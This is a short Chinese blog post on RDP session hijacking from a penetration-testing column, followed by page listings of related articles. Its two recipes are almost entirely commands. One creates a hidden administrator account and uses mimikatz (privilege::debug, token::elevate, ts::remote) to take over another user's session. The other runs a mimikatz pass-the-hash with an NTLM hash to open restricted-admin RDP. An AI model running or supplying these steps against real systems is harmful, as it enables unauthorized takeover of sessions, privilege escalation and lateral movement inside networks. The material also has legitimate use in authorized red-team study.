关于RDP劫持小技巧

最新推荐文章于 2024-05-23 09:53:51 发布
最新推荐文章于 2024-05-23 09:53:51 发布
阅读量897 收藏 1
点赞数 1
分类专栏: 内网渗透 文章标签: mimikatz 权限提升 会话劫持 系统安全 Windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Adminxe/article/details/124197551
版权

一、劫持方式1:

创建用户:

net user test 123.com /add net localgroup administrators test /add

登录后,使用mimikatz工具

privilege::debug #提权 

ts::sessions #查看当前主机的会话

token::elevate #提升本地管理员权限为system 

ts::remote /id:1 #劫持id为1的会话

二、劫持方式2:

mimikatz命令如下:

privilege::debug 

sekurlsa::pth /user:9821 /domain:DESKTOP-6RVIHJ2 /ntlm:e5df2c988f0d77ef35a9bdc95b5 "/run:mstsc.exe /restrictedadmin"

执行后弹出远程登录界面,如下图 选择连接,成功实现远程登录

Adminxe
关注
专栏目录
红队小技巧
weixin_43570648的博客
07-12 708
原文链接:(我直接粘贴过来没有图片) https://xz.aliyun.com/t/9773 前言 有一段时间没有写文章了,也不知写什么,毕竟从攻击方换成防守方,乙方换到甲方,还有些许不适应。。。但还是决定把自己接触渗透所积累的东西也拿出分享,不管糟粕,还是大伙觉得我分享的有用(那阿鑫自然是很开心),希望能帮到还在学习路上的朋友,文章若有错误,请及时联系我指出,我也不想误导才学习的朋友。此外,本文为口嗨文,基本在说思路,没有实操。 web端 (1)信息收集 收集cms信息: 1.通过云溪,wapplayz
基于 Go 的协同系统深度实践
Go中国
12-23 594
导读本文介绍的是基于网页端的操作协同,常见于教学、游戏等场景。由 TutorABC 架构师张新宇在Gopher Meetup 上海站上进行的演讲整理完成。内容结构:协同概念及应用Go 服...
SharpRDPHijack:POC远程桌面(RDP)会话劫持实用程序,用于断开连接的会话
03-08
夏普RDPH劫持 Sharp RDP Hijack是用于断开会话的概念验证.NET / C#远程桌面协议(RDP)会话劫持实用程序 背景 RDP会话劫持是一种开发后技术,用于控制(强制)断开的交互式登录会话。 在描述了该技术。 笔记 SharpRDPHijack.cs在.NET Framework v.4下的Visual Studio 2019中进行编译。 会话劫持需要提升的(管理员)上下文才能连接到另一个会话。 除非知道目标会话用户的密码,否则需要NT AUTHORITY \ SYSTEM上下文来控制会话。 没有提供的密码,SharpRDPHijack将(试图)模拟NT AUTHORITY \ SYSTEM。 Windows 2019 Server会话劫持与先前的OS版本相比表现出有趣的行为。 劫持了重定向到活动RDP会话的会话后,Windows登录屏幕会提示您输入用户的密码/凭据
RDP会话劫持
Armandhe的博客
07-22 2113
这个我也觉得很骚气啊,只是原理并不清楚
rdp劫持学习
whojoe的博客
05-13 998
rdp劫持学习rdp服务确认启动通过注册表查询通过进程查看启动rdp中间人攻击登录shift后门结合rdp劫持多用户登录手动设置rdpwrap参考文章 rdp服务确认启动 通过注册表查询 REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections # 查看RDP服务是否开启:1关闭,0开启 REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\C
如何悄无声息的对RDP和远程会话进行劫持
weixin_33709590的博客
09-20 609
本文讲的是如何悄无声息的对RDP和远程会话进行劫持?,Alexander Korznikov演示在没有登录服务器的情况下使用Sticky Keys和tscon访问管理员RDP会话: RDP会话连接的简要背景 如果你之前使用过远程桌面连接或者远程终端服务,那么你一定知道只有拥有账户密码才能进行登录。那么,你知道不用密码也可以进行登录吗?继续往下看吧。 ...
探索安全边界:SharpRDPHijack - RDP会话劫持工具
最新发布
gitblog_00077的博客
05-23 410
探索安全边界:SharpRDPHijack - RDP会话劫持工具 SharpRDPHijackA POC Remote Desktop (RDP) session hijack utility for disconnected sessions项目地址:https://gitcode.com/gh_mirrors/sh/SharpRDPHijack 在这个数字化的时代,系统安全评估与渗透测试显...
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5650
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
一本你不能错过的红蓝攻防鸿篇巨著
等风来
10-27 4850
本书是一本针对安全领域的红蓝攻防对抗的专业书,既能作为安全从业者在红蓝攻防对抗活动中的指导用书,又能成为企业安全部门构建纵深防御体系的参考指南。希望本书所分析、讲述的红蓝双方视角下的攻防对抗手法,能帮助各行业的网络安全从业者增强实践、知己知彼,从企业内部构建起安全防御体系。
〖工具〗Ladon 9.1.1 & CobaltStrike神龙插件发布
K8哥哥
12-18 6577
简介 Ladon9.1.1插件右键功能已更新174个,相比9.1.0的131个新增了43个功能,本机密码新增4个主流浏览器Chrome、Firefox、Edge、Coccoc帐密、历史记录、Cookie等,新增CMD常用渗透命令30+,Ladon9.1.1插件采用分离式加载,减少网络卡时加载Ladon导致CS假死情况。其它功能,新增.net测试&powershell测试,用于测试目标杀软是否拦截CS加载.NET程序或Powershell等,具体功能大家实战测试吧,实战为王,多说无益。 Ladon主.
〖教程〗RDP会话劫持 Ladon无密码登陆管理员桌面会话
K8哥哥
08-08 1283
前言 Windows系统下,tscon或任务管理器右键可被用来切换远程桌面的会话。正常情况下,切换会话时需要提供登录密码,但在SYSTEM权限下可够绕过验证,无密码实现未授权登录。该漏洞在2017年由以色列安全研究员Alexander Korznikov在个人博客中披露,mimikat里面也有该功能,为了方便Ladon也添加了该功能。 背景 实战中某个项目的内网HTTPS证书有问题,特别奇葩不知为何,代理或CMD下无法连WEBSHELL,还有些远程连接程序管理员连着远程机器,特别是连着数据库的在自动处理数
RDP劫持:如何透明劫持RDS以及RemoteApp会话
diansuimo2268的博客
03-11 513
https://www.anquanke.com/post/id/101525 转载于:https://www.cnblogs.com/7bit/p/10510677.html
mimikatz获取密码_新的密码劫持僵尸网络使用SMB漏洞传播到Windows系统
weixin_39918043的博客
12-19 206
一个新的cryptojacking僵尸网络正在通过多种方法遍布受感染的网络,这些方法包括针对Windows Server Message Block(SMB)通信协议的EternalBlue(永恒之蓝)漏洞。攻击者的目标是挖掘Monero(XMR)加密货币并为该任务奴役尽可能多的系统,以增加利润。复杂的运动Cisco Talos的研究人员将新的僵尸网络Prometei命名为该僵尸网络,并...
(转)通过RDP隧道绕过网络限制
zyb418的专栏
07-14 520
https://www.freebuf.com/articles/system/195692.html?utm_source=tuicool&utm_medium=referral 远程桌面服务是Windows的一个组件,各种公司都使用它来为系统管理员,运维人员和远程员工提供便利。另一方面,远程桌面服务,特别是远程桌面协议(RDP),也同样为网络攻击者提供了便利。当善于渗透的攻击者在目标...
利用哈希传递登录 RDP 远程桌面
网络安全。
01-15 1611
Windows Server 2012 R2 采用了新版的 RDP 远程桌面协议,在这个新版协议中有一个 ”受限管理员” (Restricted Admin)的特性。相信渗透测试人员和系统管理员都会对这个特性有足够的兴趣,因为通过这个特性,我们可以实现哈希传递攻击并成功登录远程桌面。在抓取到的 Hash 无法破解的情况下,如果目标主机开启了 “Restricted Admin Mode” 也行,那么我们便可以使用 Hash 来直接实现 RDP 远程登录。
mimikatz实战域渗透抓取域控管理员密码
热门推荐
404
02-07 1万+
实验环境: 攻击机:Kali 靶 机:Windows server 2012 工具:mimikatz2.1 这里实验所需要的工具我会上传到我的资源里面,有需要的小伙伴可以自己去下载 条件:靶机获取到shell之后必须是管理员的权限 步骤: **我这里攻击利用的msf里面的regsvr32_applocker_bypass_ser
内网渗透之PTH
cxk
06-03 3202
PTH (pass-the-hash) pass-the-hash在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码。 pass the hash原理: 在Windows系统中,通常会使用NTLM身份认证 NTLM认证不使用明文口令,而是使用口令加密后的hash值,hash值由系统API生成(例如LsaLogonU...
内网渗透:四、windowsRDP-hash传递登录
liu_jia_liang的博客
02-21 5545
windows的RDP-hash登录利用 在渗透测试中,如果获得了某个用户的NTLM hash,我们可以尝试使用hash传递的方法对WMI和SMB服务进行登录,对于远程桌面服务同样可以进行利用。抓取hash无法破解的情况下,如果使用hash远程登录RDP,需要开启"Restricted Admin Mode", 在Windows8.1和Windows Server 2012R2上默认开启。 一:windows RDP-受限管理模式 Restricted Admin mode简介 官方说明:Restric
rdp连接工具_横向渗透之 [RDP]
weixin_39928940的博客
11-27 1536
重生信息安全T3ngYu一、RDP 服务确定和启动 1. 确定RDP服务是否启动和服务端口 (1)注册表查询REG QUERY "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections # 查看RDP服务是否开启:1关闭,0开启 REG QUERY "HKEY_LOCAL_MACH...
2010版微软RDP协议详述:基本连接与图形远程技术详解
标题:“微软官方关于RDP协议的详尽介绍”是一份来自2010年的权威文档,专注于Microsoft Remote Desktop Protocol (RDP) 的基础连接和图形远程访问规范。该文档详细阐述了RDP协议的工作原理、设计原则和实施细节,是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Adminxe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值